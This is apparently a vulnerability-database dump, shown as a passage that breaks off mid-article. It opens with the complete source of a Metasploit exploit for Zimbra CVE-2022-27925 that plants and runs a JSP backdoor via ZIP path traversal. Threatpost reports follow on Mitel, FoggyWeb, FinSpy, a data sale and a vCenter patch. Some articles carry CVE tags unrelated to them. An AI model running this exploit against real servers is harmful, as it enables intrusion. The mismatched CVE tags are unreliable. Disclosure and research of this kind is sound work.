"authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-08-23T16:44:03", "id": "MSF:EXPLOIT-LINUX-HTTP-ZIMBRA_MBOXIMPORT_CVE_2022_27925-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/zip'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)',\n 'Description' => %q{\n This module POSTs a ZIP file containing path traversal characters to\n the administrator interface for Zimbra Collaboration Suite. If\n successful, it plants a JSP-based backdoor within the web directory, then\n executes it.\n\n The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's\n ZIP implementation that can result in the extraction of an arbitrary file\n to an arbitrary location on the host.\n\n This issue is exploitable on the following versions of Zimbra:\n\n * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)\n * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)\n\n Note that the Open Source Edition is not affected.\n },\n 'Author' => [\n 'Volexity Threat Research', # Initial writeup\n \"Yang_99's Nest\", # PoC\n 'Ron Bowes', # Analysis / module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-27925'],\n ['CVE', '2022-37042'],\n ['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'],\n ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'],\n ['URL', 'https://www.yang99.top/index.php/archives/82/'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => 
'../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/',\n 'TARGET_FILENAME' => nil,\n 'RPORT' => 7071,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-05-10',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n OptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']),\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n 
print_status(\"Target filename: #{target_filename}\")\n\n # Create a zip file\n zip = Rex::Zip::Archive.new\n zip.add_file(target_filename, payload)\n data = zip.pack\n\n print_status('Sending POST request with ZIP file')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => \"/service/extension/backup/mboximport?account-name=#{datastore['TARGET_USERNAME']}&ow=1&no-switch=1&append=1\",\n 'data' => data\n )\n\n # Check the response\n if res.nil?\n fail_with(Failure::Unreachable, \"Could not connect to the target port (#{datastore['RPORT']})\")\n elsif res.code == 404\n fail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable')\n elsif res.code != 401\n print_warning(\"Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed\")\n end\n\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n fail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?')\n end\n\n register_file_for_cleanup(target_filename)\n\n print_status(\"Trying to trigger the backdoor @ #{public_filename}\")\n\n # Trigger the backdoor\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n if res.nil?\n fail_with(Failure::Unreachable, 'Could not connect to trigger the payload')\n elsif res.code == 200\n print_good('Successfully triggered the payload')\n elsif res.code == 404\n fail_with(Failure::Unknown, \"Payload was not uploaded, the server probably isn't vulnerable\")\n else\n fail_with(Failure::Unknown, \"Could not connect to the server to trigger the payload: HTTP/#{res.code}\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb", "cvss": {"score": 6.5, "vector": 
"AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-06-28T12:49:55", "description": "Ransomware groups are abusing unpatched versions of a Linux-based Mitel VoIP (Voice over Internet Protocol) application and using it as a springboard plant malware on targeted systems. The critical remote code execution (RCE) flaw, tracked as [CVE-2022-29499](<https://nvd.nist.gov/vuln/detail/CVE-2022-29499>), was first [report by Crowdstrike](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) in April as a zero-day vulnerability and is now patched.\n\nMitel is popularly known for providing business phone systems and unified communication as a service (UCaaS) to all forms of organizations. The Mitel focuses on VoIP technology allowing users to make phone calls using an internet connection instead of regular telephone lines.\n\nAccording to Crowdstrike, the vulnerability affects the Mitel MiVoice appliances SA 100, SA 400 and Virtual SA. The MiVoice provides a simple interface to bring all communications and tools together.\n\n## **Bug Exploited to Plant Ransomware **\n\nResearcher at Crowdstrike recently investigated a suspected ransomware attack. The team of researchers handled the intrusion quickly, but believe the involvement of the vulnerability (CVE-2022-29499) in the ransomware strike.\n\nThe Crowdstrike identifies the origin of malicious activity linked to an IP address associated with a Linux-based Mitel VoIP appliance. Further analysis led to the discovery of a novel remote code exploit.\n\n\u201cThe device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment,\u201d Patrick Bennet [wrote in a blog post](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>).\n\nThe exploit involves two GET requests. 
The first one targets a \u201cget_url\u201d parameter of a PHP file and the second one originates from the device itself.\n\n\u201cThis first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses,\u201d the researcher explained.\n\nThe second request executes the command injection by performing an HTTP GET request to the attacker-controlled infrastructure and runs the stored command on the attacker\u2019s server.\n\nAccording to the researchers, the adversary uses the flaw to create an SSL-enabled reverse shell via the \u201cmkfifo\u201d command and \u201copenssl_client\u201d to send outbound requests from the compromised network. The \u201cmkfifo\u201d command is used to create a special file specified by the file parameter and can be opened by multiple processes for reading or writing purposes.\n\nOnce the reverse shell was established, the attacker created a web shell named \u201cpdf_import.php\u201d. The original content of the web shell was not recovered, but the researchers identified a log file that includes a POST request to the same IP address that the exploit originated from. The adversary also downloaded a tunneling tool called \u201cChisel\u201d onto VoIP appliances to pivot further into the network without getting detected.\n\nCrowdstrike also identified anti-forensic techniques performed by the threat actors to conceal the activity.\n\n\u201cAlthough the threat actor deleted all files from the VoIP device\u2019s filesystem, CrowdStrike was able to recover forensic data from the device. 
This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor,\u201d said Bennett.\n\nMitel released a [security advisory](<https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0002>) on April 19, 2022, for MiVoice Connect versions 19.2 SP3 and earlier. No official patch has been released yet.\n\n## **Vulnerable Mitel Devices on Shodan**\n\nThe security researcher Kevin Beaumont shared a string \u201chttp.html_hash:-1971546278\u201d to search for vulnerable Mitel devices on the Shodan search engine in a [Twitter thread](<https://twitter.com/GossiTheDog/status/1540354721931841537>).\n\nAccording to Kevin, there are approximately 21,000 publicly accessible Mitel appliances worldwide, the majority of which are located in the United States, followed by the United Kingdom.\n\n## **Mitel Mitigation Recommendations**\n\nCrowdstrike recommends that organizations tighten defense mechanisms by performing threat modeling and identifying malicious activity. The researcher also advised segregating critical assets and perimeter devices to restrict access in case perimeter devices are compromised.\n\n\u201cTimely patching is critical to protect perimeter devices. 
However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant,\u201d Bennett explained.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-28T12:42:34", "type": "threatpost", "title": "Mitel VoIP Bug Exploited in Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-06-28T12:42:34", "id": "THREATPOST:7F03D6D7702417D24F26A06CBC31EE83", "href": "https://threatpost.com/mitel-voip-bug-exploited/180079/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-28T22:42:30", "description": "On its own, the database of 3.8 billion phone numbers [leaked from ](<https://threatpost.com/clubhouse-users-data-hacker-forum/165354/>) social-media platform Clubhouse didn\u2019t have much value on the underground market. 
In fact, they were eventually dumped in a hacker forum for free.\n\nBut an enterprising threat actor has reportedly combined those phone numbers with 533 million [Facebook profiles leaked last April](<https://threatpost.com/facebook-accounts-leaked-check-exposed/165245/>) and is selling that enhanced trove of personally identifiable information (PII) to the highest bidder on the underground market.\n\nAccording to CyberNews, the combined [Clubhouse-Facebook database](<https://cybernews.com/security/3-8-billion-allegedly-scraped-and-merged-clubhouse-and-facebook-user-records-put-for-sale-online/>) includes names, phone numbers and other data, and is listed on an underground forum for $100,000 for all 3.8 billion entries, with smaller chunks of data available for less. Reportedly, the seller is still looking for buyers.\n\n## **Data Likely to Fuel ATO Attacks**\n\nThese credentials could quickly be leveraged for basic account takeover (ATO) attacks, according to Brian Uffelman, who is a security analyst for PerimeterX.\n\n\u201cThese stolen credentials are then used for credential-stuffing and ATO attacks, which can steal value, whether that is in the form of gift cards, credit-card numbers, loyalty points or making false purchases,\u201d Uffelman told Threatpost. \u201cATO attacks are a major threat to any business and all of this just creates more fuel to feed the ATO attack fire.\u201d\n\nHe added that it\u2019s much easier for cybercriminals to use stolen credentials than to do the work of trying to find holes in an organization\u2019s cybersecurity defenses. In fact, Uffelman pointed out PerimeterX research showed out of all login attempts measured in the second half of 2020, up to 85 percent were ATO attempts.\n\n\u201cOrganizations need to be aware of signs that they\u2019ve been attacked,\u201d Uffelman warned. 
\u201cThese can include surges in help-desk calls, spikes in password resets and inhuman user behaviors, such as thousands of login attempts on an account in a short time period and then take the appropriate action to block these attacks.\u201d\n\nUsers need to be aware of signs of breach, too, he added.\n\n\u201cConsumers need to ensure they are using varied and robust passwords across different websites and applications and lock down their credit reports as well.\u201d\n\n## **Facebook-Clubhouse Data Will Fuel Smishing Attacks **\n\n[Smishing](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>), or socially engineered phishing attempts conducted through SMS text messages, is a likely way cybercriminals will try to turn this database into profit, Jake Williams, from BreachQuest told Threatpost.\n\n\u201cWith this information, threat actors can send SMS phishes while spoofing the sender\u2019s number of a known friend,\u201d Williams said. \u201cA threat actor could go even further by using an SMS phishing pretext tailored to the victim based on their recent Facebook posts. Users are advised to be extremely careful in acting on unexpected SMS messages, even from senders they believe they know.\u201d\n\nWilliams added that Clubhouse users need to be on the lookout for suspicious texts, particularly those asking to transfer funds or confirm requests with a phone call, which are both common smishing tactics.\n\nAnd even if petty thieves don\u2019t see the value in the information, John Bambenek from Netenrich told Threatpost that he suspects intelligence agencies will take notice.\n\n\u201cBreaches like these often get sold at a discount because the ones who stole the data don\u2019t know what to do with it. In some cases, intelligence agencies will buy them if they have targets of interest on those platforms,\u201d Bambenek said. 
\u201cLikely the biggest use will go into the secondary consumer data market for those who want to build profiles for specific ad targeting.\u201d\n\nBeyond immediate ramifications of the enhanced data falling into the wrong hands, Archie Agarwal from ThreatModeler pointed out that as these leaks continue, it will enable threat actors to create incredibly rich profiles of targets.\n\n\u201cAside from using data like this for more targeted scamming, there is a much larger concern,\u201d Agarwal told Threatpost. \u201cAs we share more and more personal information across an ever-growing list of social-media platforms, combining data gleaned from this type of scraping, together with leaked breach information and leveraging big-data analytics to mine it, could potentially reveal previously hidden information and behaviors on users.\u201d\n\n## **Users Have Accepted Risks**\n\nWhile the infosec community is alarmed by the prospect of all that data floating around, Roger Grimes from KnowBe4 doesn\u2019t expect the seller of the combined Clubhouse-Facebook data to get much financial gain out of the deal.\n\n\u201cMy bet is the seller doesn\u2019t get anywhere close to their $100,000 asking price. It\u2019s not a scarce resource,\u201d Grimes said in an email to Threatpost.\n\nHe also noted that while he agrees the data could fuel future smishing and other socially engineered attacks, he doesn\u2019t suspect much pushback from users.\n\n\u201cI think most people simply see this as a cost of using free internet services, Clubhouse or any other service,\u201d he said.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. 
_[_JOIN_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[_4 Golden Rules of Linux Security_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[_REGISTER NOW_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-27T14:59:58", "type": "threatpost", "title": "3.8 Billion Users\u2019 Combined Clubhouse, Facebook Data Up for Sale", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T14:59:58", "id": "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "href": "https://threatpost.com/clubhouse-facebook-data-sale/175023/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-29T14:13:43", "description": "The threat actors behind the notorious SolarWinds supply-chain attacks have dispatched new malware to steal data and maintain persistence on victims\u2019 networks, researchers have found.\n\nResearchers from the Microsoft Threat Intelligence Center (MSTIC) have observed the APT it calls Nobelium using a post-exploitation backdoor dubbed FoggyWeb, to attack Active Directory Federation Services (AD FS) servers. 
AD FS enables single sign-on (SSO) across cloud-based apps in a Microsoft environment, by sharing digital identity and entitlement rights.\n\nThe attacks started as far back as April, Ramin Nafisi from MSTIC wrote in a [blog post](<https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/>) published Monday.\n\nNobelium is employing \u201cmultiple tactics to pursue credential theft\u201d to gain admin privileges to AD FS servers, Nafisi wrote. Then, once a server is compromised, the threat group deploys FoggyWeb \u201cto remotely exfiltrate the configuration database of compromised AD FS servers, decrypted [token-signing certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/token-signing-certificates>) and [token-decryption certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/certificate-requirements-for-federation-servers>),\u201d he said, which can be used to penetrate into users\u2019 cloud accounts.\n\nIn addition to remotely exfiltrating sensitive data, FoggyWeb also achieves persistence and communicates with a command-and-control (C2) server to receive additional malicious components and execute them, Nafisi added.\n\n## **Backdoor Breakdown**\n\nNafisi provides a thorough breakdown of the sophisticated FoggyWeb backdoor, which operates by allowing abuse of the Security Assertion Markup Language (SAML) token in AD FS, he explained in the post.\n\n\u201cThe backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target\u2019s AD FS deployment,\u201d Nafisi wrote. 
\u201cThe custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.\u201d\n\nAttackers store the malware in an encrypted file called _Windows.Data.TimeZones.zh-PH.pri_, while the malicious file _version.dll_ acts as a loader. The DLL file leverages the CLR hosting interfaces and APIs to load FoggyWeb, a managed DLL, in the same Application Domain within which legitimate AD FS managed code is executed.\n\nIn this way, FoggyWeb gains access to the AD FS codebase and resources, including the AD FS configuration database. The malware also inherits AD FS service account permissions that are required to access the AD FS configuration database, Nafisi wrote.\n\nAdditionally, \u201cbecause FoggyWeb is loaded into the same application domain as the AD FS managed code, it gains programmatical access to the legitimate AD FS classes, methods, properties, fields, objects and components that are subsequently leveraged by FoggyWeb to facilitate its malicious operations,\u201d he added.\n\nMoreover, FoggyWeb is AD FS version-agnostic, which means it doesn\u2019t need to keep track of legacy versus modern configuration table names and schemas, named pipe names and other version-dependent properties of AD FS, Nafisi wrote.\n\n## **Malware Mitigation**\n\nMicrosoft has notified all customers observed being targeted or compromised by FoggyWeb, as well as included a comprehensive list of compromise indicators in the post.\n\nThe company also has recommended several mitigation actions for organizations, including: auditing on-premises and cloud infrastructure to identify any changes the actor might have made to maintain access; removing user and app access, reviewing configurations for each, and re-issuing new, strong credentials; and using a hardware security module to prevent the exfiltration of sensitive data.\n\nMicrosoft 
also is advising that all customers review their AD FS Server configuration and implement whatever changes are needed to secure the systems from attacks.\n\n## **Tracking a Known Threat Actor**\n\nMicrosoft researchers have been keeping a wary eye on Nobelium since the company [got caught up](<https://threatpost.com/microsoft-solarwinds-spy-attack-federal-agencies/162414/>) in the [SolarWinds attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that was first discovered late last year. They\u2019ve been tracking the threat group\u2019s activity and capabilities, which have expanded as the actors have built and deployed new malware.\n\nSince [the SolarWinds incident](<https://threatpost.com/dhs-sophisticated-cyberattack-foreign-adversaries/162242/>), researchers have observed Nobelium steadily building out its arsenal beyond the Sunburst/Solorigate backdoor and Teardrop malware it initially deployed in that attack, which reached tens of thousands of organizations around the globe (though fewer than 100 were selected by the attackers for actual breach and compromise).\n\nThe group used malware called [Raindrop](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) in those follow-on SolarWinds attacks, then later added [GoldMax, GoldFinder and Sibot](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) malware for layered persistence to its toolset.\n\nMicrosoft researchers also identified EnvyScout, BoomBox, NativeZone and VaporRage as four pieces of malware that were used in a Nobelium [email-based attack chain](<https://threatpost.com/solarwinds-nobelium-phishing-attack-usaid/166531/>) earlier this year.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. 
_[**_JOIN_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[**_4 Golden Rules of Linux Security_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[**_REGISTER NOW_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T14:39:49", "type": "threatpost", "title": "SolarWinds Attackers Hit Active Directory Servers with FoggyWeb Backdoor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T14:39:49", "id": "THREATPOST:CD203B10BCB138850F42815F74C8A5AF", "href": "https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:44:05", "description": "The FinSpy surveillance kit has been driven from its hiding place following an eight-month investigation by Kaspersky researchers. Detections of the spyware trojan have dwindled since 2018, but it turns out that it hasn\u2019t gone away \u2013 it\u2019s simply been hiding behind various first-stage implants that have helped to cloak its activities. At the same time, it\u2019s continued to advance its capabilities.\n\nFinSpy (aka FinFisher or Wingbird) is a multiplatform software for Windows, macOS and Linux that\u2019s marketed as a tool for law enforcement. 
However, much like [NSO Group’s Pegasus](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>), it’s often seen [being used for far more malicious purposes](<https://threatpost.com/finspy-modules-secure-messaging-apps/146372/>). First discovered in 2011, it’s a full-service spyware, capable of stealing information and credentials as well as keeping tabs on user activities. For instance, it gathers file listings and deleted files, as well as various documents; can livestream or record data via webcam and microphone; can snoop on messaging chats; and it uses the developers’ mode in browsers to intercept traffic protected with HTTPS.

In the middle of 2019, several suspicious installers for legitimate applications such as TeamViewer, VLC Media Player and WinRAR were found to contain malicious code. However, they didn’t seem connected to any known malware, according to Kaspersky. Then researchers stumbled across a Burmese-language website that hosted both the trojanized installers and samples of FinSpy for Android.

“We began detecting some suspicious installers of legitimate applications, backdoored with a relatively small, obfuscated downloader,” according to Kaspersky researchers Igor Kuznetsov and Georgy Kucherin, presenting at a retro-themed and virtual Security Analyst Summit (SAS) 2021 on Tuesday. “Over the course of our investigation, we found out that the backdoored installers are nothing more than first-stage implants that are used to download and deploy further payloads before the actual FinSpy trojan.”

## **Multiple Evasion Techniques**

The new samples are protected with multiple layers of evasion tactics. For one, after a victim downloads and executes a trojanized application, they’re vetted by two components, according to the analysis. The first is a “pre-validator” that runs multiple security checks to ensure that the device it is infecting does not belong to a security researcher.

The pre-validator downloads a host of security shellcodes from the command-and-control (C2) server and executes them – 33 of them in all. Each shellcode collects specific system information (e.g., the current process name) and uploads it back to the server, researchers noted. If any of the checks fail, the C2 server terminates the infection process.

Kaspersky researchers Georgy Kucherin and Igor Kuznetsov presenting at the virtual Security Analyst Summit (SAS) 2021.

If all security checks pass, the server provides a second component, dubbed the “post-validator.” It collects information that allows it to identify the victim machine and perhaps validate a specific target (it logs running processes, recently opened documents and screenshots) and sends it to a C2 server specified in its configuration.

Based on the information collected, the C2 server decides whether to deploy the full-fledged trojan platform or remove the infection, according to Kaspersky.

If FinSpy is finally deployed, it arrives heavily obfuscated with four complex, custom-made obfuscators, according to Kaspersky’s analysis.

“The primary function of this obfuscation is to slow down the analysis of the spyware,” the researchers explained.

Another evasion tactic involves a sample of FinSpy that infects machines by replacing the Windows UEFI bootloader, which is responsible for launching the operating system.

“This method of infection allowed the attackers to install a bootkit without the need to bypass firmware security checks,” according to [the research](<https://securelist.com/finspy-unseen-findings/104322/>). “UEFI infections are very rare and generally hard to execute, they stand out due to their evasiveness and persistence. While in this case the attackers did not infect the UEFI firmware itself, but its next boot stage, the attack was particularly stealthy, as the malicious module was installed on a separate partition and could control the boot process of the infected machine.”

The amount of work put into making FinSpy inaccessible to security researchers is particularly worrying, if impressive, said Kuznetsov. “It seems like the developers put at least as much work into obfuscation and anti-analysis measures as in the trojan itself,” he noted. “The fact that this spyware is deployed with high precision and is practically impossible to analyze also means that its victims are especially vulnerable, and researchers face a special challenge – having to invest an overwhelming amount of resources into untangling each and every sample.”

## **Highly Modular FinSpy**

Kaspersky also looked into the capabilities of the latest samples to see if there have been advancements and found that FinSpy’s architecture remains highly modular, but more difficult to analyze than ever. That’s because a component called “the hider” encrypts all of the modules.

“It encrypts all of the memory pages, belonging to the whole infrastructure, including the orchestrator and all of the plugins, and all the memory pages will just stay encrypted until they are needed,” explained Kuznetsov. “The moment the code has to be executed or data has to be accessed, that one page is decrypted. Then when it is no longer needed, it’s just encrypted back.”

He added, “This means that if you even make a live memory image of an infected machine it will be very hard to find the trojan in memory, because the only unencrypted thing that you will see, will be a tiny part of this hider.”

The hider is also responsible for starting “the orchestrator,” which is a core module that will load the rest of the functionality and control the plugins, according to the analysis. It remains more or less the same as it was in previous samples, Kuznetsov said, but it adds a new module called “the communicator,” which is a hard-coded binary within a resource section of the orchestrator used to maintain C2 communication.

Another new module is a process worm.

“This doesn’t infect or propagate between the machines. Instead, it propagates within the machine, starting from the top process where the whole architecture started (usually explorer.exe or Winlogon.exe),” explained Kuznetsov. “It will make copies of itself in all the child processes, and all these child processes infected will maintain communication with the parent process.”

This worm module also hooks the keyboard, mouse clicks and various APIs to FinSpy’s various plugins, for data-collection purposes.

“The plugins themselves are used mostly to collect information about the victim,” he said. “There are not many plugins devoted to other tasks. We haven’t found any plugins devoted to lateral movement for example, though there is one curious plugin that is devoted to infecting BlackBerry devices.”

There are individual plugins for stealing credentials for VPNs, dial-up credentials, Microsoft product key information, browser search and browsing history, information about Wi-Fi connections, file listings, and more.
There’s also a generic plugin for recording audio from any voice over IP (VoIP) software.

“What is also interesting is that there are forensic tools for uncovering information about deleted files and storing that deleted-file history,” Kuznetsov said. “There is also quite a unique plugin that exploits the debug function of modern browsers. By setting a particular environment variable, they make the browsers dump all the SSL encryption keys on disk. And by doing this, the attackers can decrypt all the SSL traffic from the victim.”

All of the information can be collected in real time and can be live-streamed to the attackers or pre-recorded. Data collection can be triggered by launching an application of interest as well, the researcher noted.

One thing is clear: FinSpy remains under active development, and its authors have put a herculean effort into avoiding analysis.

“We spent about eight months full time, with several researchers,” Kuznetsov said. “During that time we really had to upgrade all our tooling. We had to invent and make some tools from scratch, all of which led to producing a 300-page report on this. And what is the conclusion here? We think that there is no conclusion, because we believe that this story is never-ending. They will keep updating and upgrading their infrastructure, all the time.”

Source record: Threatpost, “SAS 2021: FinSpy Surveillance Kit Re-Emerges Stronger Than Ever”, published 2021-09-28T17:45:59; CVE list: CVE-2021-22005; CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P); https://threatpost.com/finspy-surveillance-kit/175068/

VMware has released a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that includes patches for 19 CVE-numbered vulnerabilities that affect the company’s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.

They’re all serious, but one – CVE-2021-22005, a critical arbitrary file upload vulnerability in the Analytics service that’s been assigned a CVSSv3 base score of 9.8 – is uber nasty.

“This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,” [said Bob Plankers](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>), Technical Marketing Architect at VMware.

The time to act is yesterday, Plankers wrote:

> “In this era of ransomware it is safest to assume that
an attacker is already inside your network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible.” —Bob Plankers, [VMware vSphere blog](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)

The security update addresses flaws in vCenter Server 6.5, 6.7, and 7.0.

## When to Act?

The time to act is “Right now,” Plankers said. “These updates fix a critical security vulnerability, and your response needs to be considered at once.”

CVE-2021-22005 can be used to execute commands and executables on the vCenter Server Appliance. The company didn’t tiptoe around the need for urgent action: Users should patch this vulnerability “immediately,” VMware said in its [FAQ for VMSA-2021-0020](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>). The bug could have nasty repercussions, with exploits likely being hammered out “minutes after the disclosure,” it said:

> “The ramifications of this vulnerability are serious and it is a matter of time – likely minutes after the disclosure – before working exploits are publicly available.” [—VMware FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>)

## Assume That Attackers Are Already In Your System

